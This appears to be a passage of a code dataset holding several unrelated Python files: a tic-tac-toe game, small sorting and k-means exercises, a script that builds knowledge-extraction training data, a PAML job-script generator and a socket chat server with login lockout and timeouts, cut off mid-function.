\tboard[6] == board[7] == board[8] == mark or \n \tboard[0] == board[3] == board[6] == mark or \n \tboard[1] == board[4] == board[7] == mark or \n \tboard[2] == board[5] == board[8] == mark or \n \tboard[0] == board[4] == board[8] == mark or \n \tboard[2] == board[4] == board[6] == mark)\n\n'''win check'''\n#win_check(testBoard,('X'))\n\n#function that returns a tulip with (player going first, player going second) \ndef choose_first():\n flip = random.randint(0,1)\n if flip == 0:\n return 'Player 1','Player 2'\n else:\n return 'Player 2', 'Player 1'\n\n#function that returns true if space on board is not occupied \ndef space_check(board, position):\n return not(board[position] == 'X' or board[position] == 'O')\n\n#function that checks if any positions on board are empty then return falls \n#*uses space_check function to check if board is full\ndef full_board_check(board):\n for position in range(9):\n if space_check(board,position):\n return False\n return True\n\n#function that takes user input and places marker\n#*also has to check if space is free at that possition*\ndef player_choice(board):\n code = ['1','2','3','4','5','6','7','8','9']\n while True:\n userInput = input('Enter a position(1-9): ')\n if userInput in code:\n if space_check(board, int(userInput)-1):\n return (int(userInput)-1)\n print('position is not available')\n\n#function that asks user if he/she would like to play again\ndef replay():\n while True:\n userInput = input('do you want to play again?(Y or N): ')\n if userInput.upper() == 'Y':\n return True\n elif 
userInput.upper() == 'N':\n return False\n\n#MAIN \n#*GAME START*\nwhile True:\t\n clear()\n print('Welcome to Tic Tac Toe!\\n')\n board = ['1','2','3','4','5','6','7','8','9']\n print('Board positions look as follows, use this to enter a marker:')\n display_board(board)\n firstPlayer = choose_first()\n print(f'\\n{firstPlayer[0]} goes first, good luck!\\n')\n marker = player_input() # returns tuple (player1 marker, player2 marker)\n\n '''use code below to remove board numbers in game'''\n #board = [' ',' ',' ',' ',' ',' ',' ',' ',' ']\n \n #while game is active \n while True:\n clear()\n #First players turn.\n #show players turn\n print(f'{firstPlayer[0]}:')\n #display the board\n display_board(board)\n #ask player where to place marker\n place_marker(board, marker[0], player_choice(board))\n #check if player won or if board is full, else continue to next player\n if win_check(board, marker[0]):\n clear()\n display_board(board)\n print(f'\\n{firstPlayer[0]} wins!!'*3)\n break \n #only first player can fill board so there's no need to check if board is full for second player\n elif full_board_check(board):\n clear()\n print(' O_O '* 3)\n display_board(board)\n print(\"\\nIt's a tie!\\n\")\n break \n #Second players turn.\n clear()\n #show players turn\n print(f'{firstPlayer[1]}:')\n #display board\n display_board(board)\n #ask player where to place marker\n place_marker(board, marker[1], player_choice(board))\n #check if player won; if so, stop looping\n if win_check(board, marker[1]):\n clear()\n display_board(board)\n print(f'\\n{firstPlayer[1]} wins!!'*3)\n break\n \n #ask players if they would like to play again\n if not replay():\n break\n\n\n ","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"592699102","text":"def read_data(file, converter=None):\n with open(file) as f:\n data = f.read().strip().split('\\n')\n if converter is not None:\n converted = []\n for d in data:\n converted.append(converter(d))\n data = converted\n return data\n\n","sub_path":"2020/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"349991080","text":"# 2D coordinate sorting problem\n\nn = int(input()) # read the number of elements\narray = [] # declare the array\n\nfor i in range(n):\n x, y = map(int, input().split())\n array.append((x, y)) # read the elements one by one as two-integer tuples\n\n# For sorting we usually set a key function. For this 2D coordinate problem, y and x are swapped\n# in the key so that sorting is done by the y value first.\n# For example, to sort by squared value: array.sort(key=lambda x : x*x)\n
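# e.g. [(3, 1), (2, 5), (1, 1)] sorted with this key becomes [(1, 1), (3, 1), (2, 5)]\n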
array.sort(key=lambda x : (x[1], x[0])) \n\nfor x, y in array:\n print(x, y)","sub_path":"3주차/노하람/(정렬)난 올라가는게 좋아.py","file_name":"(정렬)난 올라가는게 좋아.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"87013683","text":"from numpy import random, array\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import scale\nfrom numpy import random, float\n\n## First we create some fake data with k clusters and N people\n\ndef createClusteredData(N,k):\n #random.seed(10)\n pointsPerCluster = float(N/k)\n X=[]\n for i in range (k):\n #for each k define a centroid according to a uniform distribution\n incomeCentroid = random.uniform(20000.0, 200000.0)\n ageCentroid = random.uniform(20.0,70.0)\n for j in range(int(pointsPerCluster)):\n #around each centroid define a cloud of normally distributed points\n X.append([random.normal(incomeCentroid,10000.0),random.normal(ageCentroid,2.0)])\n X = array(X)\n return X\n\ndata = createClusteredData(100, 5)\n\nmodel = KMeans(n_clusters=5)\n#insert scaled data into the kmeans model\nmodel = model.fit(scale(data))\nprint(model.labels_)\n\nplt.figure()\n# plt.scatter(data[:,0],data[:,1],c=models.labels_.astype(float))\nplt.scatter(data[:,0],data[:,1], c=model.labels_.astype(float))\nplt.show()\n\n\n\n\n ","sub_path":"python/sundog/kmeansclustering.py","file_name":"kmeansclustering.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"186551658","text":"# coding=utf-8\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom config import Config\nfrom model import BERT_LSTM_CRF\nimport torch.optim as optim\nfrom utils import load_vocab, read_corpus, load_model, save_model,Tjson\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nimport random\nfrom tqdm import tqdm\nimport os\n# import fire\nfrom random import shuffle\n\ndef build_dataset(train_file,type=\"all\"):\n \"\"\"\n Baidu training set\n train_file: file path\n type=\"all\" or \"mini\"\n \"\"\"\n tjson=Tjson(file_path=train_file)\n tjson_save=Tjson(file_path=\"data/train.json\")\n dev_json_save=Tjson(file_path=\"data/dev.json\")\n data=[]\n for item in tqdm(tjson.load()):\n \n text= item['text']\n # print(text)\n # print(item['spo_list'])\n predicate={}\n for n in item['spo_list']:\n predicate[n['predicate']]=[]\n for n in item['spo_list']:\n one={\n \"subject\":n['subject'],\"object\":n['object'],\n }\n predicate[n['predicate']].append(one)\n # print(predicate)\n p_n=list(range(20))\n # random.shuffle(p_n) \n label = [\"O\"]*len(text)\n for i,p in enumerate( predicate):\n # print('p',p)\n # print(predicate)\n # i=0\n i=0\n # for m in predicate[p]:\n # start_a =text.find(m['subject'])\n # end_a=text.find(m['subject'])+len(m['subject'])\n # for n in range(start_a,end_a):\n # # label[n]='M_A_'+str(p_n[i])\n # label[n]='M_A'\n # pass\n # start_a =text.find(m['object'])\n # end_a=text.find(m['object'])+len(m['object'])\n # for n in range(start_a,end_a):\n # # label[n]='M_B_'+str(p_n[i])\n # label[n]='M_A'\n # pass\n start_p =text.find(p)\n end_p=text.find(p)+len(p)\n if start_p>=0:\n for n in range(start_p,end_p):\n # label[n]='M_P_'+str(p_n[i])\n label[n]='M_P'\n pass\n # print(label)\n
 if len(list(text))==len(list(label)):\n one={\"text\":list(text), \"label\":label}\n data.append(one)\n else:\n # print(\"pass\")\n pass\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\ndef auto_label(label,new):\n if label==\"O\":\n return new\n else:\n # return label+'_'+new\n return new\ndef mark_word_label(text,label_b,word,tp=\"实体\"):\n p=word\n start_p =text.find(p)\n end_p=text.find(p)+len(p)-1\n if start_p>=0:\n if len(p)>3:\n label_b[start_p]=auto_label(label_b[start_p],'B-'+tp)\n label_b[end_p]=auto_label(label_b[end_p],'E-'+tp)\n for n in range(start_p+1,end_p):\n label_b[n]=auto_label(label_b[n],'M-'+tp)\n pass\n elif len(p)==3:\n label_b[start_p]=auto_label(label_b[start_p],'B-'+tp)\n label_b[end_p]= auto_label(label_b[end_p],'E-'+tp)\n label_b[start_p+1]= auto_label(label_b[start_p+1],'M-'+tp)\n elif len(p)==1:\n label_b[start_p]=auto_label(label_b[start_p],'S-'+tp)\n elif len(p)==2:\n label_b[start_p]=auto_label(label_b[start_p],'B-'+tp)\n label_b[end_p]= auto_label(label_b[end_p],'E-'+tp)\n return label_b,start_p\n# def mark_one(text,kgs):\n# # root_label = [\"O\"]*len(text)\n# print(\"###\"*20)\n# print(text)\n# print(\"kgs\",kgs)\n# for ner in kgs.keys():\n# label= [\"O\"]*len(text)\n# label1=mark_word_label(text,label,ner,\"实体\")\n# print('word',ner,\"++++++++++++++++++++\")\n# for pword in kgs[ner]:\n# # kgs[ner][pword]['label']=label1 \n \n# # label1=kgs[ner][pword]['label']\n# # # tag the relation\n# # label1=mark_word_label(text,label,ner,\"实体\")\n# label2=mark_word_label(text,label1,pword,\"关系\")\n# # print(label2)\n# # print('label1',label1)\n# # # print(\"---\"*10)\n# # print('label2',label2)\n# # kgs[ner][pword]['label']=label2\n# label3=label2\n# # print(\"-_-\"*10)\n# # print(\"kgs\",kgs)\n# for p in kgs[ner][pword]['objects']:\n# # tag the description \n# label3=mark_word_label(text,label3,p,\"描述\")\n# # print(ner,pword,kgs[ner][pword]['objects'])\n# kgs[ner][pword]['label']=label3\n# # print('label3',label3)\n# print(\"¥¥¥¥¥¥¥¥\"*20)\n# print(ner,pword,kgs[ner][pword])\n# # del label3\n# # del label2\n# print(kgs) \n\n\ndef build_dataset_kg(train_file,type=\"all\"):\n \"\"\"\n Baidu training set\n converted to a sequence-labeling dataset\n train_file: file path\n type=\"all\" or \"mini\"\n\n Construction idea:\n merge the multiple descriptions of a subject into one training example\n\n use NER to extract the entities in the sentence\n\n text: ner + sentence\n label: ['K']*len(ner) + normal tags\n \"\"\"\n tjson=Tjson(file_path=train_file)\n all_save=Tjson(file_path=\"data/train_all.json\")\n tjson_save=Tjson(file_path=\"data/train.json\")\n dev_json_save=Tjson(file_path=\"data/dev.json\")\n data=[]\n i=0\n for item in tqdm(tjson.load()):\n # i=i+1\n # if i==1000:\n # break\n # print(item)\n text= item['text']\n \n # print(text)\n # print(item['spo_list'])\n predicate={}\n for n in item['spo_list']:\n predicate[n['predicate']]=[]\n kgs={}\n # s_n=0\n for n in item['spo_list']:\n if kgs.get(n['subject'])==None:\n kgs[n['subject']]={}\n\n label= [\"O\"]*len(text)\n # w=n['subject']\n # label,s=mark_word_label(text,label,w,\"实体\")\n\n # w=n['predicate']\n # label,s=mark_word_label(text,label,w,\"关系\")\n\n w=n['object']\n label,s=mark_word_label(text,label,w,\"描述\")\n kgs[n['subject']][n['predicate']]={\"objects\":[n['object']],'label':label}\n elif kgs[n['subject']].get(n['predicate'])==None:\n\n label= [\"O\"]*len(text)\n # w=n['subject']\n # label,s=mark_word_label(text,label,w,\"实体\")\n\n # w=n['predicate']\n # label,s=mark_word_label(text,label,w,\"关系\")\n\n w=n['object']\n label,s=mark_word_label(text,label,w,\"描述\")\n
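# subject already seen but this predicate is new: start its entry with a fresh label sequence\n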
 kgs[n['subject']][n['predicate']]={\"objects\":[n['object']],'label':label}\n else:\n\n label= kgs[n['subject']][n['predicate']]['label']\n # w=n['subject']\n # label,s=mark_word_label(text,label,w,\"实体\")\n\n # w=n['predicate']\n # label,s=mark_word_label(text,label,w,\"关系\")\n\n w=n['object']\n label,s=mark_word_label(text,label,w,\"描述\")\n kgs[n['subject']][n['predicate']]['objects'].append(n['object'])\n # if s>=0:\n # s_n=s_n+1\n \n # mark_one(text,kgs)\n # print(kgs)\n for ner in kgs.keys():\n for p in kgs[ner]:\n # print('####'*20)\n # print(kgs[ner][p])\n # print(text)\n # print(kgs[ner][p]['label'])\n one={\"text\":list(ner+'#'+p+'#'+text),'label':len(ner)*['K']+['X']+len(p)*['P']+['X']+kgs[ner][p]['label']}\n if len(one['text'])==len(one['label']):\n data.append(one)\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n all_save.save(data)\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\n\n\n\n\ndef build_dataset_kg_check(train_file,type=\"all\"):\n \"\"\"\n Turn the Baidu training set into examples for judging whether an extracted triple is reasonable\n \"\"\"\n tjson=Tjson(file_path=train_file)\n # all_save=Tjson(file_path=\"data/train_all.json\")\n tjson_save=Tjson(file_path=\"data/kg_check/train.json\")\n dev_json_save=Tjson(file_path=\"data/kg_check/dev.json\")\n data=[]\n i=0\n for item in tqdm(tjson.load()):\n for n in item['spo_list']:\n kg_one=[n['subject'],n['predicate'],n['object']]\n kg=' [KG] '+\",\".join(kg_one)+\" [/KG] \"+ item['text']\n one={\n 'sentence':kg,\n 'label':1\n }\n data.append(one)\n kg_one_list=list(\",\".join(kg_one))\n shuffle(kg_one_list)\n # print(kg_one_list)\n if kg_one_list != list(\",\".join(kg_one)):\n kg=' [KG] '+\"\".join(kg_one_list)+\" [/KG] \"+ item['text']\n one={\n 'sentence':kg,\n 'label':0\n }\n data.append(one)\n # print(data[10:])\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n # all_save.save(data)\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\n\n\n\ndef build_dataset_ner(train_file,type=\"all\"):\n \"\"\"\n Baidu training set\n converted to a sequence-labeling dataset\n training set for entity tagging and relation-word extraction\n train_file: file path\n type=\"all\" or \"mini\"\n\n Construction idea:\n merge multiple descriptions into one training example\n\n use NER to extract the entities in the sentence\n\n text: ner + sentence\n label: ['K']*len(ner) + normal tags\n \"\"\"\n tjson=Tjson(file_path=train_file)\n all_save=Tjson(file_path=\"data/train_all.json\")\n # tjson_save=Tjson(file_path=\"data/ner_train.json\")\n # dev_json_save=Tjson(file_path=\"data/ner_dev.json\")\n tjson_save=Tjson(file_path=\"data/ner_train.json\")\n dev_json_save=Tjson(file_path=\"data/ner_dev.json\")\n data=[]\n \n for item in tqdm(tjson.load()):\n text= item['text']\n label= [\"O\"]*len(text)\n ner={}\n for n in item['spo_list']:\n try:\n ner[n['subject']].append(n['predicate'])\n except:\n ner[n['subject']]=[n['predicate']]\n for nr in ner:\n s=0\n for n in ner[nr]:\n label,s1=mark_word_label(text,label,n,\"关系\")\n if s1>=0:\n s=s+1\n if s>0:\n one={'text':list(nr+'#'+text),'label':['K']*len(nr)+['X']+label}\n data.append(one)\n # print(one)\n\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n # all_save.save(data)\n print(\"total examples\",len(data))\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\n\n\n\n\n\n\n\n\ndef build_dataset_gpt2(train_file,type=\"all\"):\n \"\"\"\n Baidu training set\n train_file: file path\n type=\"all\" or \"mini\"\n \"\"\"\n tjson=Tjson(file_path=train_file)\n tjson_save=Tjson(file_path=\"data/train.json\")\n dev_json_save=Tjson(file_path=\"data/dev.json\")\n data=[]\n f = open('data/gpt2kg.txt','a')\n
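# serialize each sentence followed by its triples as [KGS] [KG] s,p,o [/KG] ... [KGE] blocks for GPT-2 LM training\n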
 for item in tqdm(tjson.load()):\n \n text= item['text']\n # print(text)\n # print(item['spo_list'])\n predicate={}\n kg=\" [KGS] \"\n for n in item['spo_list']:\n # predicate[n['predicate']]=[]\n # print(n)\n # print(n)\n kg=kg+' [KG] '+n['subject']+\",\"+n['predicate']+\",\"+n['object']+\" [/KG] \"\n\n\n pass\n \n # data=text+str(item['spo_list'])\n data=text+kg+\" [KGE] \"\n print(\"***\"*10)\n print(data)\n f.write(data+'\\n\\n')\n f.close()\n\n\nif __name__ == '__main__':\n # fire.Fire()\n train_files=[\"/mnt/data/dev/tdata/知识提取/train_data.json\",\"/mnt/data/dev/tdata/知识提取/dev_data.json\"]\n # train_file=\"data/ner_train.json\"\n # dev_file=\"data/ner_dev.json\"\n # train_file=\"data/train.json\"\n # dev_file=\"data/dev.json\"\n # if os.path.exists(train_file) or os.path.exists(dev_file):\n # print(\"file already exists\")\n # print(\"please delete it manually\")\n # else:\n for f in train_files:\n # build_dataset(f,type=\"all\")\n ### build the knowledge-extraction training set\n # build_dataset_kg(f,type=\"all\")\n\n # tag entities and relation words\n # build_dataset_ner(f,type=\"all\")\n # build_dataset_gpt2(f,type=\"mini\")\n build_dataset_kg_check(f,type=\"all\")\n\n\n\n\n\n\n\n\n\n\n","sub_path":"构建知识库训练集gpt2和bert.py","file_name":"构建知识库训练集gpt2和bert.py","file_ext":"py","file_size_in_byte":12672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"464635087","text":"#!/usr/bin/python3\n# hessian_splitter.py by josh\n\nimport sys\nimport re\nimport os\nimport string\nimport shutil\nimport subprocess\n\nlocusPattern = re.compile(\"^\\*\\*\\* Locus (\\d) \\*\\*\\*\")\n\nbasemlString = \"\"\"#!/bin/sh\n#$ -cwd # Use current working directory\n#$ -V # Verbose\n#$ -j y # Maximum output, inc errors\n#$ -r y # Condense error files into one\n#$ -l node_type=nxv\n#$ -l h_rt=240:0:0 # Request runtime (up to 240 hours)\n#$ -l h_vmem=4G # Request RAM per core\n#$ -m bea # Status emails\n\n/data/home/btw915/programs/login2/paml4.9e/bin/baseml tmp000{}.ctl\n\n\"\"\"\n\nlocusList = []\n\ninFile = open(\"out.txt\", \"r\")\n\nfor idx, line in enumerate(inFile):\n if \"Locus\" in line:\n if not locusPattern.match(line):\n print(line)\n sys.exit(\"Error, line not in expected format\")\n print(idx, line)\n locus = locusPattern.match(line).group(1)\n print(locus)\n locusList.append(locus)\n while not \"Printing out site pattern counts\" in line:\n line = inFile.readline()\n print(\"Found site pattern section:\", line)\n outDir = \"locus_{}\".format(locus)\n if not os.path.isdir(outDir):\n os.makedirs(outDir)\n outFileName = \"{}/tmp000{}.txt\".format(outDir, locus)\n print(\"Writing to new file:\", outFileName)\n outFile = open(outFileName, \"w\")\n line = inFile.readline()\n line = inFile.readline()\n while not \"Frequencies\" in line:\n outFile.write(line)\n line = inFile.readline()\n outFile.close()\n print(\"Found frequencies line, done:\", line)\n outFile = open(\"{}/tmp000{}.ctl\".format(outDir, locus), \"w\")\n templateCtl = open(\"tmp0001.ctl\", \"r\")\n for templateLine in templateCtl:\n if \"tmp0001\" in templateLine:\n templateLine = templateLine.replace(\"tmp0001\", \"tmp000{}\".format(locus))\n outFile.write(templateLine)\n outFile.close()\n templateCtl.close()\n print(\"Copying tree...\")\n shutil.copy(\"tmp0001.trees\", \"{}/tmp000{}.trees\".format(outDir, locus))\n outFile = open(\"{}/baseml_{}.sh\".format(outDir, locus), \"w\")\n outFile.write(basemlString.format(locus))\n outFile.close()\n
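# make the generated job script executable so it can be run or submitted directly\n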
 subprocess.call([\"chmod\",\"u+x\",\"{}/baseml_{}.sh\".format(outDir, locus)])\n\ninFile.close()\n\nprint(locusList)\n\nquit()\n\n\n\n","sub_path":"hessian_splitter.py","file_name":"hessian_splitter.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"273070693","text":"'''\nUsed the sample code as the base from \nhttps://pythonprogramming.net/server-chatroom-sockets-tutorial-python-3/\nCoding: utf-8\nEdited by: z5147986\nUsage: \n(easy) - python3 server.py\n(default) - python3 server.py <server_port> <block_duration> <timeout>\n'''\nfrom socket import *\nfrom select import *\nfrom utility import authenticate, user_exists_On9clients, user_exists_Off9clients, user_exists, user_blocked\nimport sys\nimport datetime \n\n# for easy testing uncomment this\nserver_host = 'localhost'\nserver_port = 12000\nblock_duration = 60\ntimeout = 120\n\n# FIXME before submitting\n# for easy testing comment this\n# server_host = 'localhost'\n# server_port = int(sys.argv[1])\n# block_duration = int(sys.argv[2])\n# timeout = int(sys.argv[3])\n\n# Create a socket\n# socket.AF_INET - address family, IPv4; some other possibilities are AF_INET6, AF_BLUETOOTH, AF_UNIX\n# socket.SOCK_STREAM - TCP, connection-based; socket.SOCK_DGRAM - UDP, connectionless, datagrams; socket.SOCK_RAW - raw IP packets\nserver_socket = socket(AF_INET, SOCK_STREAM)\n\n# SO_ - socket option\n# SOL_ - socket option level\n# Sets REUSEADDR (as a socket option) to 1 on socket\n# ensures that socket reuse is set up BEFORE it is bound. Will avoid the TIME_WAIT issue\nserver_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\n# Bind, so server informs operating system that it's going to use given server_host and server_port\n# For a server using 0.0.0.0 means to listen on all available interfaces, useful to connect locally to 127.0.0.1 and remotely to LAN interface server_host\nserver_socket.bind((server_host, server_port))\n\n# This makes server listen to new connections\nserver_socket.listen()\n\n# List of sockets for select()\nsockets_list = [server_socket]\n\n# List of connected clients - socket as a key, user header and credentials as data\nonline_clients = {}\n\n# list of blocked clients\nblocked_clients = {}\n\n# list of offline clients\noffline_clients = {}\n\n# list of offline messages\noffline_messages = {}\n\nprint(f'Listening for connections on {server_host}:{server_port}')\n\n# Handles message receiving\ndef receive_message(client_socket):\n try:\n # Receive header containing message length, its size is defined as 20\n message_header = client_socket.recv(20)\n\n # If we received no data, client gracefully closed a connection, for example using socket.close() or socket.shutdown(socket.SHUT_RDWR)\n if not len(message_header):\n return False\n\n # Convert header to int value\n message_length = int(message_header.decode())\n\n # Return a dict object of message header and message data\n return {'header': message_header, 'data': client_socket.recv(message_length)}\n\n except:\n # If we are here, client closed connection violently, for example by pressing ctrl+c on his script\n # or just lost his connection\n # socket.close() also invokes socket.shutdown(socket.SHUT_RDWR) which sends information about closing the socket (shutdown read/write)\n # and that's also a cause when we receive an empty message\n return False\n\nwhile (1):\n # Calls Unix select() system call or Windows select() WinSock call with three parameters:\n # - rlist - sockets to be monitored for incoming data\n # - wlist - sockets for data to be sent to (checks if for example 
buffers are not full and socket is ready to send some data)\n # - xlist - sockets to be monitored for exceptions (we want to monitor all sockets for errors, so we can use rlist)\n # Returns lists:\n # - reading - sockets we received some data on (that way we don't have to check sockets manually)\n # - writing - sockets ready for data to be send thru them\n # - errors - sockets with some exceptions\n # This is a blocking call, code execution will \"wait\" here and \"get\" notified in case any action should be taken\n read_sockets, _, exception_sockets = select(sockets_list, [], sockets_list)\n\n # --- timeout start ---\n for timeout_socket in list(online_clients):\n current_time = datetime.datetime.now()\n if 'last-active' in online_clients[timeout_socket]:\n minus_timeout = current_time - datetime.timedelta(seconds=timeout)\n if minus_timeout == online_clients[timeout_socket]['last-active'] or minus_timeout > online_clients[timeout_socket]['last-active']:\n print('Connection timeout for: {} since {}'.format(online_clients[timeout_socket]['data'].decode().split(',')[0], (online_clients[timeout_socket]['last-active'] + datetime.timedelta(seconds=timeout)).strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]))\n user = 'WICKWICK\\'S SERVER'.encode()\n user_header = f\"{len(user):<{20}}\".encode()\n message = 'Connection Timeout at {} due to inactivity. Bye {}!'.format((online_clients[timeout_socket]['last-active'] + datetime.timedelta(seconds=timeout)).strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3], online_clients[timeout_socket]['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n timeout_socket.send(user_header + user + message_header + message)\n\n # add to logged out list\n offline_clients[timeout_socket] = online_clients[timeout_socket]\n\n # Remove from list for socket.socket()\n sockets_list.remove(timeout_socket)\n\n # Remove from our list of users\n del online_clients[timeout_socket]\n\n # send indication of termination to client\n # timeout_socket.shutdown(SHUT_RDWR)\n timeout_socket.close()\n # --- timeout end ---\n\n # Iterate over notified sockets\n for notified_socket in read_sockets:\n\n # If notified socket is a server socket - new connection, accept it\n if notified_socket == server_socket and notified_socket not in online_clients:\n\n # Accept new connection\n client_socket, client_address = server_socket.accept()\n\n # to track retry count\n retry_count = 0\n\n # Client send message\n while(1):\n # FIXME if have time implement this extra feature\n # --- accept timeout start ---\n # 60 second to login else close connection, others waiting\n # current_time = datetime.datetime.now()\n \n # if current_time > (accepted_time + datetime.timedelta(seconds=60)):\n # print(f'Connection timeout for: {client_address}')\n # message = 'Connection Timeout, login faster!'.encode()\n # message_header = f\"{len(message):<{20}}\".encode()\n # timeout_socket.send(message_header + message)\n # break\n # --- accept timeout end ---\n\n user = receive_message(client_socket)\n # If False client disconnected before sending credentials\n if user is False:\n continue\n\n # print(user['data'].decode()) # \"username,password\"\n credentials = user['data'].decode().split(',')\n # print(credentials[0]) # username\n # print(credentials[1]) # password \n \n # --- block_duration start ---\n check = None\n # check blocked account\n for blocked in blocked_clients:\n if blocked_clients[blocked]['data'].decode() == credentials[0]:\n username = blocked_clients[blocked]['data'].decode() 
for blocked in blocked_clients:\n if blocked_clients[blocked]['data'].decode() == credentials[0]:\n username = blocked_clients[blocked]['data'].decode() #.split(',')[0]\n # check block duration by doing current time - block duration\n current_time = datetime.datetime.now()\n minus_blocked = current_time - datetime.timedelta(seconds=block_duration)\n if minus_blocked >= blocked_clients[blocked]['account-blocked']:\n print(f'UNBLOCKED: {username}\'s account!')\n if username == credentials[0]:\n message = 'Your account has been UNBLOCKED since {}, {}!'.format(current_time.strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3], username).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n del blocked_clients[blocked]\n break\n else:\n check = username\n if username == credentials[0]:\n print(f'BLOCKED: {username} is still blocked!')\n message = 'Your account is blocked {}. Please try again after {}!'.format(username, (blocked_clients[blocked]['account-blocked'] + datetime.timedelta(seconds=block_duration)).strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n client_socket.shutdown(SHUT_RDWR)\n client_socket.close()\n break\n continue\n # if user tries to log in after block with new client_socket\n if check == credentials[0]:\n break\n # --- block_duration end ---\n\n # --- Check duplicate login start ---\n if user_exists_On9clients(username=credentials[0], on9clients=online_clients):\n print(f'AUTHENTICATION: {credentials[0]} is already online. FAILED!')\n message = f'SERVER: {credentials[0]} is already online!'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n break\n # --- Check duplicate login end ---\n\n # --- Authentication start ---\n result = authenticate(credential=credentials)\n\n print(f'AUTHENTICATION for {credentials[0]}: {result}')\n if 'Successful' in result:\n\n # Add accepted socket to select() list\n sockets_list.append(client_socket)\n\n user['logged-in'] = datetime.datetime.now()\n\n # to check user inactivity - timeout\n user['last-active'] = user['logged-in']\n\n # user will have user_header and credentials\n online_clients[client_socket] = user\n\n username = user['data'].decode().split(',')[0]\n print('Accepted new connection from {}:{}, username: {}'.format(*client_address, username))\n \n # print('client socket is {}:{}'.format(client_socket.getsockname()[0], client_socket.getsockname()[1]))\n # print('client socket is {}'.format(client_address)) \n # store for p2p\n user['private-connection'] = client_address\n # user['private-connection'] = (client_socket.getsockname()[0], client_socket.getsockname()[1])\n\n message = '--------------------------'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n message = '---- offline messages ----'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n message = '--------------------------'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n # update logged out clients list and send all offline message(s)\n for offline_socket in offline_clients:\n if offline_clients[offline_socket]['data'].decode().split(',')[0] == credentials[0]:\n if offline_socket in offline_messages:\n for msg in offline_messages[offline_socket]:\n # print(offline_messages[msg])\n if credentials[0] == 
msg['recipient'].decode().split(',')[0]:\n message = '{} > {}'.format(msg['sender'].decode().split(',')[0], msg['message'].decode()).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n del offline_messages[offline_socket]\n del offline_clients[offline_socket]\n break\n\n message = '--------------------------'.encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n # send login date and time\n message = 'Welcome back {}! You logged in at: {}'.format(username, user['logged-in'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n client_socket.send(message_header + message)\n\n for online_socket in online_clients:\n blocked = False\n # But don't send it to the sender\n if client_socket != online_socket:\n # check if user is in my block list\n if 'blocked-user' in online_clients[client_socket]:\n for i in range(len(online_clients[client_socket]['blocked-user'])):\n if online_clients[online_socket]['data'] == online_clients[client_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n # check if I'm in the user's block list\n if 'blocked-user' in online_clients[online_socket]:\n for i in range(len(online_clients[online_socket]['blocked-user'])):\n if online_clients[client_socket]['data'] == online_clients[online_socket]['blocked-user'][i]['data']:\n exist = True\n blocked = True\n break\n if not blocked:\n message = '{} logged in at {}'.format(user['data'].decode().split(',')[0], user['logged-in'].strftime(\"%d/%m/%Y, %H:%M:%S.%f\")[:-3]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n online_socket.send(user['header'] + user['data'] + message_header + message)\n break\n else:\n if 'Password' in result:\n retry_count += 1\n user['retry'] = retry_count\n # if the 3rd retry fails, block the user\n if user['retry'] >= 3:\n print(f'BLOCKED: {credentials[0]}\'s account. Retry count: {retry_count}')\n user['account-blocked'] = datetime.datetime.now()\n message = 'Invalid Password. Retry count limit reached. Please try again later after {}. 
